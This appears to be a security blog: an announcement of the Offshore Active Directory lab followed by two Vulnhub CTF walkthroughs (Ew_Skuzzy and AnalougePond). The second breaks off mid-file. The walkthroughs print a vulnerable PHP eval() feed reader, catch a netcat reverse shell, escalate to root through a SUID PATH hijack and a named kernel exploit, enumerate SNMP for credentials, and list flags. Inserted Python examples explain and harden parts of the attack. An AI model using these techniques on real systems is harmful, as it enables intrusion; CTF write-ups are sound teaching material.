In August ch4p from Hack the Box approached me with an offer to build a CTF for the annual Greek capture the flag event called Panoptis. The idea was to build a unique Active Directory lab environment to challenge CTF competitors by exposing them to a simulated real-world penetration test (pretty rare for a CTF). I spent a bit over a month building the first iteration of the lab and thus Offshore was born.
I flew to Athens, Greece for a week to provide on-site support during the lab. Overall the CTF lab was a hit and very well received by the competitors and others involved with the event.
Afterwards, ch4p offered for me to further build out the lab and eventually offer it as a Pro Lab on the main Hack the Box website. I spent another 3 or so months refining elements within the lab, increasing the overall size and difficulty and causing ch4p a lot of stress by asking for more and more storage, RAM and virtual networks.
I spent countless hours with the goal of building a realistic Active Directory based lab that had the feel of a real-world corporate environment made up of many things I have seen during internal/external penetration testing engagements over the years. My goal was to produce a lab that would be accessible and achievable by junior penetration testers, help mid-level folks improve their skills and even provide a bit of a challenge to seasoned veterans. The lab also serves as a test bed to try out many common and obscure AD attacks that you may read about but either never encounter during a real-world engagement or do not have the proper testing environment to practice and refine the techniques.
The lab went live on September 1, 2018 and has been a hit so far. Of course there were a few issues I had to hammer out after go-live and some lessons learned but overall it has been a success. This project has been an exciting and humbling experience. I learned a ton while building this and configuring many of the attacks. So far feedback has been positive.
Anyway, let's get into a description of the lab.
Description
You are an agent tasked with exposing money laundering operations in an offshore international bank. Breach the DMZ and pivot through the internal network to locate the bank’s protected databases and a shocking list of international clients. OFFSHORE is designed to simulate a real-world penetration test, starting from an external position on the internet and gaining a foothold inside a simulated corporate Windows Active Directory network. Users will have to pivot and jump across trust boundaries to complete the lab. This lab is intended to expose participants to:
Web application attacks
Enumeration
Exploitation of common and obscure real-world Active Directory flaws
Local privilege escalation
Lateral movement and crossing trust boundaries
Evading endpoint protections
Reverse engineering
Out-of-the-box thinking
Players will have the opportunity to attack 16 hosts of various operating system types and versions to obtain 29 flags across a realistic Active Directory lab environment with various standalone challenges hidden throughout. The Active Directory lab simulates the look and feel of a real-world corporate network complete with very active simulated users and other elements of a busy enterprise. The lab is designed to start out relatively easy and progress in difficulty throughout.
Users will start from an external perspective and have to penetrate the “DMZ” and then move laterally through the CORP.LOCAL, DEV, ADMIN and CLIENT forests to complete the lab.
Target Audience
I designed Offshore to appeal to a wide variety of users, from junior-level penetration testers to seasoned testers, as well as infosec hobbyists and even blue teamers; there is something for everyone. I can pretty much guarantee you will pick up at least a few new tricks which can be immediately applied to your real-world engagements or taken back to your organization to help improve its overall security posture.
Pricing
Please reach out for pricing. Tickets are available for 30, 60, or 90 days of access for individuals. Corporate pricing is also available for larger groups.
Additional Information
Offshore is hosted in conjunction with Hack the Box (https://www.hackthebox.eu). Participants will receive a VPN key to connect directly to the lab.
Once connected to VPN, the entry point for the lab is 10.10.110.0/24. *Note* The firewall at 10.10.110.3 is out of scope.
If you have questions or would like to learn more about the lab, feel free to contact me on Twitter or on Mattermost. Participants in the lab will have access to a private Offshore channel on the Netsecfocus Mattermost (https://chat.netsecfocus.com/join).
It’s been a while since I’ve had the time to take on a VM over at vulnhub or put together a walkthrough. Building my own challenges, studying for the OSCE, work, and family took all of my time.
I finally had some free time so I checked out the latest slew of releases. Ew_Skuzzy had been up for a few days without any walkthroughs so it looked like a good challenge.
The readme has a note that VMware users may have issues. If you use VMware workstation like I do (or player) these steps will get you up and running.
I first attached a CD-rom to the VM and added a Gparted ISO, selected boot to firmware and changed the boot order in BIOS to boot from the ISO. Once Gparted loaded I was able to mount the file system and make a few changes with the following steps within a terminal window:
1) sudo su
2) mount /dev/sda1 /mnt
3) vim /mnt/etc/network/interfaces and change the interface to 'eth0'
4) vim /mnt/etc/default/grub and edit the line GRUB_CMDLINE_LINUX="" to read: GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
5) poweroff
6) Swap the Gparted ISO for an Ubuntu server ISO, follow the same steps to boot from the CD and once the installer menu loads choose "rescue a broken system" to boot into rescue mode.
7) Follow all the prompts until arriving at the screen that allows you to execute a shell on /dev/sda1.
8) In this shell type "update-grub", then type "exit".
9) Select "execute a shell in the installer environment", then "poweroff".
10) Remove the CD from the VM, boot to firmware and change the boot order back to the HDD.
Once the VM boots up it should grab a lease from DHCP and be fully discoverable from your attacking machine.
Once that was done I fired up the VM, and got to work. The creator was nice enough to post the IP for us:
I started off with an nmap scan of all ports which showed SSH, nginx on port 80 and an iSCSI service listening on port 3260.
root@kali:~# nmap -sV -p- -T4 192.168.85.146
Starting Nmap 6.46 ( http://nmap.org ) at 2017-03-21 13:09 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.85.146
Host is up (0.00023s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     (protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.46%I=7%D=3/21%Time=58D15E6E%P=i686-pc-linux-gnu%r(NULL,2
SF:9,"SSH-2\.0-OpenSSH_7\.2p2\x20Ubuntu-4ubuntu2\.1\r\n");
MAC Address: 00:0C:29:C8:3D:31 (VMware)
I ran dirb for a bit and came up with several trolls:
The page source of the above page had a base64 encoded comment in the HTML:
Sadly not our first flag:
root@kali:~# echo SGVsbG8sIGlzIGl0IGZsYWdzIHlvdSdyZSBsb29raW5nIGZvcj8KSSBjYW4gc2VlIGl0IGluIHlvdXIgZXllcwpJIGNhbiBzZWUgaXQgaW4geW91ciBzbWlsZQpGbGFncyBhcmUgYWxsIEkndmUgZXZlciB3YW50ZWQgYW5kIG15IHBvcnRzIGFyZSBvcGVuIHdpZGUgCkNhdXNlIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBzYXkgYW5kIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBkbwpBbmQgSSB3YW50IHRvIHRlbGwgeW91IHNvIG11Y2gsIG5vIGZsYWdzIGZvciB5b3UuLi4K | base64 -d
Hello, is it flags you're looking for?
I can see it in your eyes
I can see it in your smile
Flags are all I've ever wanted and my ports are open wide
Cause you know just what to say and you know just what to do
And I want to tell you so much, no flags for you...
I next mounted the file system and found the first flag along with a floppy disk image:
root@kali:~# mount /dev/sdb /mnt/skuzzy/
root@kali:~# cd /mnt/skuzzy/
root@kali:/mnt/skuzzy# ls
bobsdisk.dsk flag1.txt lost+found
root@kali:/mnt/skuzzy# cat flag1.txt
Congratulations! You've discovered the first flag!
flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}
Let's see how you go with the next one...
The floppy can be mounted with the following commands:
root@kali:/mnt/skuzzy# losetup /dev/loop0 /mnt/skuzzy/bobsdisk.dsk
root@kali:/mnt# mkdir /mnt/floppy
root@kali:/mnt# mount /dev/loop0 -o loop /mnt/floppy
root@kali:/mnt# ls
floppy hgfs skuzzy
root@kali:/mnt# cd floppy/
root@kali:/mnt/floppy# ls
lost+found ToAlice.csv.enc ToAlice.eml
An email to Alice gave me flag # 2 as well as several clues for how to decrypt the encrypted .csv file:
root@kali:/mnt/floppy# cat ToAlice.eml
G'day Alice,
You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs,and it's time we took a stand!
Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!
Anyway this algorithm sounded good to me. I used the updated version that won the competition.
You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly. My favourite new Spanish swear came in handy when this happened... supercalifragilisticoespialidoso! Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. The key is, well, one awesome word I learnt in my recent Spanish classes!
Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot)
Cheers,
Bob.
PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...
PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}
The Spanish swear word was likely a key “supercalifragilisticoespialidoso”;
An allusion to rockyou (possibly rockyou.txt for brute forcing the passphrase); and
Command option -md sha256 (these are openssl command line options).
The intent may have been to brute force the passphrase, but it seemed like it had already been given to us, so after a bit of trial and error I was able to decrypt the .csv with the following command, feeding it the passphrase above:
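The "-md sha256" clue matters because `openssl enc` turns a passphrase into the AES key and IV with EVP_BytesToKey, and the digest used by that derivation changed from MD5 to SHA-256 in OpenSSL 1.1.0; decrypting a SHA-256-derived file with an MD5-era client (or vice versa) yields garbage, not an error. The following is an added example, not part of the original write-up or the challenge: it implements that derivation with only the standard library, parses the "Salted__" header layout that `openssl enc -salt` writes, and shows the two digests producing different key material. The salt, ciphertext bytes and the `SAMPLE_BLOB` name are constructed here; the AES decryption itself is left to openssl.

```python
import hashlib

# `openssl enc` (with -salt, the default) writes: 8-byte magic, 8-byte salt, ciphertext.
OPENSSL_MAGIC = b"Salted__"


def evp_bytes_to_key(passphrase: bytes, salt: bytes, key_len: int, iv_len: int,
                     md: str = "sha256"):
    """OpenSSL's EVP_BytesToKey with an iteration count of 1, which is what
    `openssl enc -k <pass> -md <digest>` uses to turn a passphrase into key + IV:

        D_1 = H(pass || salt)
        D_i = H(D_{i-1} || pass || salt)

    The D_i blocks are concatenated until key_len + iv_len bytes are available."""
    material = b""
    prev = b""
    while len(material) < key_len + iv_len:
        prev = hashlib.new(md, prev + passphrase + salt).digest()
        material += prev
    return material[:key_len], material[key_len:key_len + iv_len]


def split_openssl_blob(blob: bytes):
    """Return (salt, ciphertext) from a salted `openssl enc` output, or raise."""
    if len(blob) < 16 or not blob.startswith(OPENSSL_MAGIC):
        raise ValueError("not a salted OpenSSL enc blob")
    return blob[8:16], blob[16:]


def derive_aes256_cbc_params(passphrase: str, blob: bytes, md: str = "sha256"):
    """Key and IV that `openssl enc -d -aes-256-cbc -md <md>` would derive for this blob."""
    salt, _ = split_openssl_blob(blob)
    return evp_bytes_to_key(passphrase.encode(), salt, key_len=32, iv_len=16, md=md)


# Constructed sample: a made-up salt and dummy ciphertext behind the real header layout.
# The challenge's ToAlice.csv.enc is not reproduced here.
SAMPLE_BLOB = OPENSSL_MAGIC + bytes(range(8)) + b"\x00" * 32
PASSPHRASE = "supercalifragilisticoespialidoso"

if __name__ == "__main__":
    # Same passphrase and salt, two digests: the derived keys do not match, which is
    # why a file encrypted with -md sha256 must be decrypted with -md sha256.
    for digest in ("md5", "sha256"):
        key, iv = derive_aes256_cbc_params(PASSPHRASE, SAMPLE_BLOB, digest)
        print(f"{digest:>6}: key={key.hex()} iv={iv.hex()}")
```

With MD5 the loop needs three 16-byte rounds to fill 48 bytes; with SHA-256 it needs two 32-byte rounds, so the first 32 bytes of material (the AES-256 key) differ entirely between the two settings. EVP_BytesToKey is a single unsalted-iteration KDF, which is also why the "rockyou" hint about dictionary attacks is realistic: there is no work factor slowing a guess.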
The .csv gave me flag #3 as well as some new web directories to target:
The first was a troll with some retro Geocities scrolling marquee, nice touch:
The page source again contained a base64 encoded comment which was another troll:
root@kali:~# cat base64.txt | base64 -d
George Costanza: [Soup Nazi gives him a look] Medium turkey chili. [instantly moves to the cashier]
Jerry Seinfeld: Medium crab bisque.
George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread.
Jerry Seinfeld: Just forget it. Let it go.
George Costanza: Um, excuse me, I - I think you forgot my bread.
Soup Nazi: Bread, $2 extra.
George Costanza: $2? But everyone in front of me got free bread.
Soup Nazi: You want bread?
George Costanza: Yes, please.
Soup Nazi: $3!
George Costanza: What?
Soup Nazi: NO FLAG FOR YOU
The second URL was a sweet custom web app:
The ‘Feed Reader’ page was of particular interest and at first glance looked as though it could be leveraged for either an LFI or RFI, or both!
Browsing to http://192.168.85.146/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt gave me the following:
Browsing directly to the data.txt file gave me the full contents which would be useful later:
I checked the troll image exif data for any clues but there was nothing to be had.
I next turned my attention to the ‘p’ parameter to see if I could get something going. Using the technique discussed in this post https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/ I was able to leverage an LFI to pull out the base64 encoded source of each of the PHP pages. I also ran this to try to read files such as /etc/passwd but there were some blocks in place.
Index.php
Flag.php gave me the 4th flag as well as a clue that this flag would come in handy at some point:
The contents of reader.php was particularly interesting:
<?php
defined('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Feed Reader</h1>
<?php
if (isset($_GET['url'])) {
    $url = $_GET['url'];
} else {
    print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");
}

if (isset($url) && strlen($url) != '') {
    // Setup some variables.
    $secretok = false;
    $keyneeded = true;

    // Localhost as a source doesn't need to use the key.
    if (preg_match("#^http://127.0.0.1#", $url)) {
        $keyneeded = false;
        $secretok = true;
    }

    // Handle the key validation when it's needed.
    if ($keyneeded) {
        $key = $_GET['key'];
        if (is_array($key)) {
            die("Array trick is mitigated ;)");
        }
        if (isset($key) && strlen($key) == '47') {
            $hashedkey = hash('sha256', $key);
            $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";
            // If you can use the following code for a timing attack
            // then good luck But.. You have the source anyway, right?
            if (strcmp($hashedkey, $secret) == 0) {
                $secretok = true;
            } else {
                die("Sorry... Authentication failed. Key was invalid.");
            }
        } else {
            die("Authentication invalid. You might need a key.");
        }
    }

    // Just to make sure the above key check was passed.
    if (!$secretok) {
        die("Something went wrong with the authentication process");
    }

    // Now load the contents of the file we are reading, and parse
    // the super awesomeness of its contents!
    $f = file_get_contents($url);
    $text = preg_split("/##text##/s", $f);
    if (isset($text['1']) && strlen($text['1']) > 0) {
        print($text['1']);
    }
    print "<br /><br />";

    $php = preg_split("/##php##/s", $f);
    if (isset($php['1']) && strlen($php['1']) > 0) {
        eval($php['1']);
        // "If Eval is the answer, you're asking the wrong question!" - SG
        // It hurts me to write insecure code like this, but it is in the
        // name of education, and FUN, so I'll let it slide this time.
    }
}
A check was made to ensure the file being served came from localhost; otherwise a key value was needed. The key had to be a 47-character string whose sha256 matched the hard-coded secret, passed as a parameter in the GET request. Hm, flag 4 is exactly 47 characters. The sha256 of flag 4 checked out perfectly against the $secret variable in the source:
The PHP would next check the data.txt ##text## section and print it to the screen and evaluate whatever PHP code was in the ##php## section. A quick check showed me that I had command execution.
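To make the three moving parts of reader.php explicit (the localhost prefix check, the 47-character key gate, and the ##text##/##php## split that feeds eval()), here is an added Python port of that logic with a hardened counterpart beside it. This is not code from the write-up or from the Ew_Skuzzy VM: the function names, the sample feed and the 47-character test key are constructed; the secret hash and the data.txt URL are the ones shown on the page, and the real flag is deliberately not reproduced.

```python
import hashlib
import hmac
import html
import re
from typing import Optional

# Hard-coded secret from the page's reader.php (sha256 of the 47-character key).
SECRET_SHA256 = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656"
LOCALHOST_PREFIX = re.compile(r"^http://127\.0\.0\.1")


def key_needed(url: str) -> bool:
    """reader.php skips the key check only when the URL starts with http://127.0.0.1."""
    return LOCALHOST_PREFIX.match(url) is None


def key_is_valid(key: str, secret_hex: str = SECRET_SHA256) -> bool:
    """Accept a key iff it is exactly 47 characters and sha256(key) equals the stored hash.
    reader.php does strlen($key) == '47' (PHP loose comparison) followed by strcmp();
    hmac.compare_digest is the constant-time comparison a defender would use instead."""
    if len(key) != 47:
        return False
    digest = hashlib.sha256(key.encode()).hexdigest()
    return hmac.compare_digest(digest, secret_hex)


def split_feed(body: str):
    """Mirror preg_split("/##text##/s") and preg_split("/##php##/s"): element [1] of each
    split is what reader.php prints and eval()s respectively; '' when the marker is absent."""
    text_parts = re.split(r"##text##", body, flags=re.S)
    php_parts = re.split(r"##php##", body, flags=re.S)
    text = text_parts[1] if len(text_parts) > 1 else ""
    php = php_parts[1] if len(php_parts) > 1 else ""
    return text, php


def handle_request_as_lab(url: str, key: Optional[str], body: str) -> dict:
    """The lab's behaviour: returns what would be printed and what would reach eval().
    Anything the server can fetch from 127.0.0.1 is trusted code, which is the flaw."""
    if key_needed(url):
        if key is None or not key_is_valid(key):
            return {"error": "Authentication failed"}
    text, php = split_feed(body)
    return {"printed": text, "eval_input": php or None}


def handle_request_hardened(url: str, body: str) -> str:
    """Hardened counterpart: only an exact allowlisted URL may be fetched (a prefix
    match is not an allowlist), only the ##text## section is rendered, it is HTML-escaped,
    and a ##php## section is never interpreted."""
    allowed = {"http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt"}
    if url not in allowed:
        raise PermissionError("url not in allowlist")
    text, _ = split_feed(body)
    return html.escape(text)


if __name__ == "__main__":
    # Constructed feed in the data.txt format: a text section and a code section.
    feed = "hdr##text##<b>Feed body</b>##text##tail##php##echo 'hi';##php##"
    print(handle_request_as_lab("http://127.0.0.1/feed", None, feed))
    print(handle_request_hardened(
        "http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt", feed))
```

Run as a script it prints the lab version handing `echo 'hi';` to eval() without any key, and the hardened version returning only the escaped text section. The contrast is the point of the passage: the application's only real authentication is "was the URL local", and everything fetched through it becomes executable code.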
There are several ways to get a shell, but this is what I tried after attempts to obtain a reverse shell with mknod, netcat and other methods did not work. The two commands could also have been combined into one.
I created a tiny shell script with the following PHP command and hosted it on my local Apache server:
I then executed the following two commands to upload the shell script to /tmp and execute it:
Wonderful, a shell!
root@kali:/var/www# nc -lvnp 443
listening on [any]443...
connect to [192.168.85.131] from (UNKNOWN) [192.168.85.146] 51562
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@skuzzy:~/html/c2444910794e037ebd8aaf257178c90b$ ls
ls
data.txt index.php party.php trollface.png
flag.php parrot.gif reader.php welcome.php
The usual enumeration turned up an interesting SUID binary in /opt.
Just running the binary it appeared to execute the ID command before attempting to make an SSH connection:
On a hunch that ID command was not being called with an absolute path I created a dummy file /tmp/id with the contents “/bin/sh” and modified my path variable. By doing this, if successful, when running the alicebackup binary from the /opt directory while in the /tmp directory I should be able to have the program call my malicious ID shell script due to the path abuse.
I ran the command, fixed up my path variable and it worked. I now had root access and the 5th and final flag:
This was a great VM, with an interesting twist in the iSCSI angle as well as the combined LFI/RFI. Unique, and it kept me on my toes. Setting up open-iscsi to interact with the service was not difficult and worth the learning opportunity.
Thanks to @vortexau for putting together the challenge, can’t wait to see the next one!
As always thank you to @g0tmi1k for hosting these challenges and maintaining Vulnhub.
Just around the time I was learning/experimenting with Puppet in my home lab knightmare asked me to preview a new VM based around some real-world tactics. This was a truly unique and interesting challenge and shows the dangers of leaving a Puppet, Ansible or any other configuration management or package management tool unsecured. As always the VM was ripe with cultural references which kept me on my toes researching both the nuances and the technical pieces. I highly recommend taking it for a spin, you can grab it here: https://www.vulnhub.com/entry/analougepond-1,185/
The README provides some hints for getting going:
Since you're not a Teuchter, I'll offer some hints to you:
Remember TCP is not the only protocol on the Internet
My challenges are never finished with root. I make you work for the flags.
The intended route is NOT to use forensics or 0-days, I will not complain either way.
To consider this VM complete, you need to have obtained:
TrollFlag: where you normally look for them
Flag1: You have it when you book Jennifer tickets to Paris on PanAm.
Flag2: It will include a final challenge to confirm you hit the jackpot.
Have root everywhere (this will make sense once you're in the VM)
User passwords
2 VNC passwords
Best of luck! If you get stuck, eat some EXTRABACON
NB: Please allow 5-10 minutes or so from powering on the VM for background tasks to run before proceeding to attack.
After loading it up and waiting a few minutes I had an IP and was ready to go:
I added an entry to my hosts file to simplify things and started out with an nmap scan of all TCP ports and also a UDP scan of top 1000 ports due to the readme alluding to other protocols in use.
The TCP scan just gave me an SSH port, I didn’t even attempt bruteforcing because I knew knightmare wouldn’t make it that easy.
root@mrb3n:~# nmap -sV -Pn -T4 -p- --open analoguepond
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-14 09:39 EST
Stats: 0:10:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 39.70% done; ETC: 10:05 (0:15:34 remaining)
Nmap scan report for 192.168.85.128
Host is up (0.0010s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:C9:A7:A4 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The UDP scan turned up SNMP, and based on the readme's nod towards EXTRABACON (which requires SSH, SNMP and a public SNMP community string) I directed my attention here with snmpwalk.
root@mrb3n:~# nmap -sU --open analoguepond
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-14 06:07 EST
Nmap scan report for 192.168.85.128
Host is up (0.00094s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
161/udp open snmp
MAC Address:00:0C:29:C9:A7:A4 (VMware)
I’ve truncated the output and just left in the key items:
root@mrb3n:~# snmpwalk analoguepond -c public -v1
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analougepond 3.19.0-77-generic #85~14.04.1-Ubuntu SMP Mon Dec 5 11:19:02 UTC 2016 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (103731) 0:17:17.31
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analougepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (16) 0:00:00.16
So based on this it seems pretty certain that ‘eric’ is our username. I would have tried combos such as eric.burdon, eburdon etc., but ‘eric@example.com’ seemed to be nudging me in the right direction. Our hint “There is a house in New Orleans…” could only be “the Rising Sun”, which makes sense because Eric Burdon was the lead vocalist for the band: https://en.wikipedia.org/wiki/The_Animals.
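Everything used above came from the standard SNMP system group (sysDescr, sysContact, sysName, sysLocation), which a read-only "public" community string hands to anyone on the network. As an added example (not part of the original write-up), here is a small parser for snmpwalk's text output that pulls those objects out and lists what a reviewer would flag as disclosure: kernel build from sysDescr, a contact e-mail that doubles as a username hint, and free-text location. The `SAMPLE` string is constructed to match the output shown above; the function names are my own.

```python
import re

# Constructed sample, modelled on the snmpwalk output shown above.
SAMPLE = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analougepond 3.19.0-77-generic #85~14.04.1-Ubuntu SMP Mon Dec 5 11:19:02 UTC 2016 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (103731) 0:17:17.31
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analougepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
"""

# SNMPv2-MIB system group, as snmpwalk prints the OIDs without MIBs loaded.
SYSTEM_GROUP = {
    "iso.3.6.1.2.1.1.1.0": "sysDescr",
    "iso.3.6.1.2.1.1.3.0": "sysUpTime",
    "iso.3.6.1.2.1.1.4.0": "sysContact",
    "iso.3.6.1.2.1.1.5.0": "sysName",
    "iso.3.6.1.2.1.1.6.0": "sysLocation",
    "iso.3.6.1.2.1.1.7.0": "sysServices",
}

LINE_RE = re.compile(r"^(\S+)\s*=\s*(\w+):\s*(.*)$")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w.-]+")
KERNEL_RE = re.compile(r"\d+\.\d+\.\d+-\d+-\w+")


def parse_snmpwalk(text: str) -> dict:
    """Return {objectName: value} for system-group OIDs found in snmpwalk output."""
    found = {}
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # continuation lines, blank lines, "End of MIB" etc.
        oid, vtype, value = m.groups()
        name = SYSTEM_GROUP.get(oid)
        if name is None:
            continue
        if vtype == "STRING":
            value = value.strip('"')
        elif vtype == "INTEGER":
            value = int(value)
        found[name] = value
    return found


def exposure_findings(info: dict) -> list:
    """Items a reviewer would flag when a public community string returns these values."""
    findings = []
    kernel = KERNEL_RE.search(info.get("sysDescr", ""))
    if kernel:
        findings.append(f"kernel build disclosed via sysDescr: {kernel.group(0)}")
    for email in EMAIL_RE.findall(info.get("sysContact", "")):
        findings.append(f"contact e-mail disclosed via sysContact (username hint): {email}")
    if info.get("sysLocation"):
        findings.append(f"free-text sysLocation disclosed: {info['sysLocation']!r}")
    return findings


if __name__ == "__main__":
    info = parse_snmpwalk(SAMPLE)
    for finding in exposure_findings(info):
        print("-", finding)
```

On the defensive side the fix is mundane: restrict the agent to SNMPv3 with authentication, or at least replace "public" and bind the agent to the management network; sysContact and sysLocation should hold a role mailbox and a site code rather than a person's name and a lyric.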
Cranking this up in my headphones as the wife and kid slept I was able to SSH in with the creds eric:therisingsun.
Once in I was dropped into Eric’s home directory and had a couple of images as well as a binary named ‘spin’ which appeared to do just that, throw up a spinning cursor. Not useful…yet. I pulled down the images with SCP and checked for anything tasty in the exif data but came up empty, for now.
eric@analougepond:~$ pwd
/home/eric
eric@analougepond:~$ ls
reticulatingsplines.gif
hmm, no clue at this point but I’ll hang onto it, it may prove to be useful.
The readme mentioned VNC passwords, a netstat showed that VNC was present on the localhost on 5900 and 5901. Ifconfig showed a virtual bridge on the 192.168.122.0/24 subnet so we must be dealing with some libvirt emulation here. The readme also mentions multiple hosts, I am guessing 2 additional ones :).
eric@analougepond:~$ netstat -antp
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:5900          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:5901          0.0.0.0:*               LISTEN      -
tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0    408 192.168.85.128:22       192.168.85.129:55386    ESTABLISHED -
tcp6       0      0 :::22                   :::*                    LISTEN      -
Looking around the file system I really didn’t find much at first. Digging deeper I believe I found the locations of the VNC passwords but could not read them until I was root, will come back to that later.
Doing a uname -a showed that the kernel was likely vulnerable to the overlayfs root exploit:
eric@analoguepond:/var/lib/libvirt/network$ uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Running it, we’ve got our root shell and, of course, our first troll flag.
root@analoguepond:/tmp# cd /root
root@analoguepond:/root# ls
flag.txt
root@analoguepond:/root# cat flag.txt
C'Mon Man! Y'all didn't think this was the final flag so soon...?
Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker... This is obviously troll flah #1 So keep going.
Taking a look at the libvirt default.xml network file gives us IPs and hostnames for our other hosts.
root@analoguepond:/var/lib/libvirt/network# ls
default.xml
root@analoguepond:/var/lib/libvirt/network# cat default.xml
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh net-edit default
or other application using the libvirt API.
-->
<networkstatus>
  <class_id bitmap='0-2'/>
  <floor sum='0'/>
  <network>
    <name>default</name>
    <uuid>8edd2858-f408-4a4a-86f1-0993b59c6b30</uuid>
    <forward mode='nat'>
      <nat>
        <port start='1024' end='65535'/>
      </nat>
    </forward>
    <bridge name='virbr0' stp='on' delay='0'/>
    <mac address='52:54:00:b2:23:25'/>
    <ip address='192.168.122.1' netmask='255.255.255.0'>
      <dhcp>
        <range start='192.168.122.10' end='192.168.122.15'/>
        <host mac='52:54:00:5b:05:f7' name='puppet' ip='192.168.122.2'/>
        <host mac='52:54:00:6d:93:6a' name='barringsbank' ip='192.168.122.3'/>
      </dhcp>
    </ip>
  </network>
</networkstatus>
We can also find live hosts with a little bash one-liner:
root@analoguepond:/var/lib/libvirt/network# for ip in 192.168.122.{1..254}; do ping -c 1 $ip > /dev/null && echo "${ip} is up"; done
192.168.122.1 is up
192.168.122.2is up
192.168.122.3is up
Next we need the qemu config files to grab the VNC passwords:
root@analoguepond:/etc/libvirt/qemu# find / -name "*.xml"
...snip...
/etc/libvirt/qemu/barringsbank.xml
/etc/libvirt/qemu/puppet.xml
root@analoguepond:/etc/libvirt/qemu# cat barringsbank.xml
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
